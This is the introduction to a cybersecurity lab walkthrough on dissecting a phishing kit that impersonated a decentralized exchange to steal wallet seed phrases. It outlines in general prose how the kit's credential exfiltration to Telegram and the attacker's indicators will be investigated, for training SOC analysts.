This lab focuses on analyzing a phishing kit designed to impersonate a decentralized exchange platform in order to steal sensitive cryptocurrency wallet credentials, such as seed phrases. The phishing kit was hosted on a compromised server and includes a variety of files and scripts that provide insight into the attacker’s methods. By dissecting the kit, investigators can uncover the techniques used for data exfiltration, such as real-time transmission of credentials to a Telegram bot, as well as local logging for redundancy.
Through this walkthrough, we will explore the structure of the phishing kit, the functionality of its scripts, and the tools leveraged by the attacker to enhance their campaign’s effectiveness. We will also identify key indicators of compromise (IoCs) and details about the attacker’s online presence, including usernames and associated metadata. This analysis will not only help in understanding the threat actor's tactics but also in building a comprehensive threat intelligence profile.
As we progress, the lab will demonstrate how legitimate services, such as Telegram, can be misused for malicious purposes and how investigators can use the same tools and APIs to uncover critical evidence. The walkthrough serves as an essential exercise for SOC analysts and cybersecurity professionals to enhance their investigative skills in detecting and mitigating phishing threats.